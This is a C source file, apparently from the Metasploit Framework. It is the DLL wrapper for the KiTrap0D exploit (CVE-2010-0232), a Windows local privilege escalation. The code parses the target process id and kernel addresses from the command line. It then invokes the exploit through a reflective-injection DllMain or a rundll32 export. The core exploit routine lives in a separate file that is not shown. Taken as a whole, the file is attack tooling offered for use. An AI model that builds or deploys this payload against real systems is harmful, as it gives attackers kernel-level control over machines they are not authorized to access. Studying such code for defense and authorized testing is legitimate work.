metasploit-framework/external/source/exploits/CVE-2010-0232/kitrap0d_payload/main.c

157 lines
3.8 KiB
C
Executable File

//
// Note: To use the produced x86 dll on NT4 we use a post build event "editbin.exe /OSVERSION:4.0 /SUBSYSTEM:WINDOWS,4.0 elevator.dll"
// in order to change the MajorOperatingSystemVersion and MajorSubsystemVersion to 4 instead of 5 as Visual C++ 2008
// can't build PE images for NT4 (only 2000 and up). The modified dll will then work on NT4 and up. This does
// not apply to the produced x64 dll.
//
#define REFLECTIVEDLLINJECTION_VIA_LOADREMOTELIBRARYR
#define REFLECTIVEDLLINJECTION_CUSTOM_DLLMAIN
#include "../common/ReflectiveLoader.c"
#include <stdlib.h>
#include "kitrap0d.h"
#include "../common/common.h"
/*!
* @brief Grab a \c DWORD value out of the command line.
* @example elevator_command_dword( "/FOO:0x41414141 /BAR:0xCAFEF00D", "/FOO:" ) == 0x41414141
* @param cpCommandLine Command line string
* @param cpCommand The command to look for to get the associated \c int from.
* @returns The \c int value associated with the \c cpCommand.
*/
DWORD elevator_command_dword(char * cpCommandLine, char * cpCommand)
{
char * cpString = NULL;
DWORD dwResult = 0;
do
{
if (!cpCommandLine || !cpCommand) {
break;
}
cpString = strstr(cpCommandLine, cpCommand);
if (!cpString) {
break;
}
cpString += strlen(cpCommand);
dwResult = strtoul(cpString, NULL, 0);
} while (0);
return dwResult;
}
/*!
* @brief Grab an \c int value out of the command line.
* @example elevator_command_dword( "/FOO:12345 /BAR:54321", "/FOO:" ) == 12345
* @param cpCommandLine Command line string
* @param cpCommand The command to look for to get the associated \c int from.
* @returns The \c int value associated with the \c cpCommand.
*/
int elevator_command_int(char * cpCommandLine, char * cpCommand)
{
char * cpString = NULL;
int iResult = 0;
do
{
if (!cpCommandLine || !cpCommand) {
break;
}
cpString = strstr(cpCommandLine, cpCommand);
if (!cpString) {
break;
}
cpString += strlen(cpCommand);
iResult = atoi(cpString);
} while (0);
return iResult;
}
/*!
* @brief The real entrypoint for this app.
* @param cpCommandLine Pointer to the command line.
*/
VOID elevator_main(char * cpCommandLine)
{
DWORD dwResult = ERROR_SUCCESS;
do
{
dprintf("[KITRAP0D] elevator_main. cpCommandLine=0x%08X", (DWORD)cpCommandLine);
if (!cpCommandLine) {
break;
}
if (strlen(cpCommandLine) == 0) {
break;
}
dprintf("[KITRAP0D] elevator_main. lpCmdLine=%s", cpCommandLine);
DWORD dwProcessId = 0;
DWORD dwKernelBase = 0;
DWORD dwOffset = 0;
dwProcessId = elevator_command_dword(cpCommandLine, "/VDM_TARGET_PID:");
dwKernelBase = elevator_command_dword(cpCommandLine, "/VDM_TARGET_KRN:");
dwOffset = elevator_command_dword(cpCommandLine, "/VDM_TARGET_OFF:");
if (!dwProcessId || !dwKernelBase) {
break;
}
dprintf("[KITRAP0D] Invoking exploit");
elevator_kitrap0d(dwProcessId, dwKernelBase, dwOffset);
// ...we should never return here...
dprintf("[KITRAP0D] This shouldn't happen");
} while (0);
}
/*!
* @brief rundll32.exe entry point.
* @todo Remove this?
*/
VOID DLLEXPORT CALLBACK a(HWND hWnd, HINSTANCE hInstance, LPSTR lpszCmdLine, int nCmdShow)
{
elevator_main(lpszCmdLine);
ExitProcess(ERROR_SUCCESS);
}
/*!
* @brief DLL entry point.
* @remark If we have been injected via RDI, lpReserved will be our command line.
*/
BOOL WINAPI DllMain(HINSTANCE hInstance, DWORD dwReason, LPVOID lpReserved)
{
BOOL bReturnValue = TRUE;
switch (dwReason)
{
case DLL_PROCESS_ATTACH:
hAppInstance = hInstance;
if (lpReserved != NULL) {
elevator_main((char *)lpReserved);
}
break;
case DLL_PROCESS_DETACH:
case DLL_THREAD_ATTACH:
case DLL_THREAD_DETACH:
break;
}
return bReturnValue;
}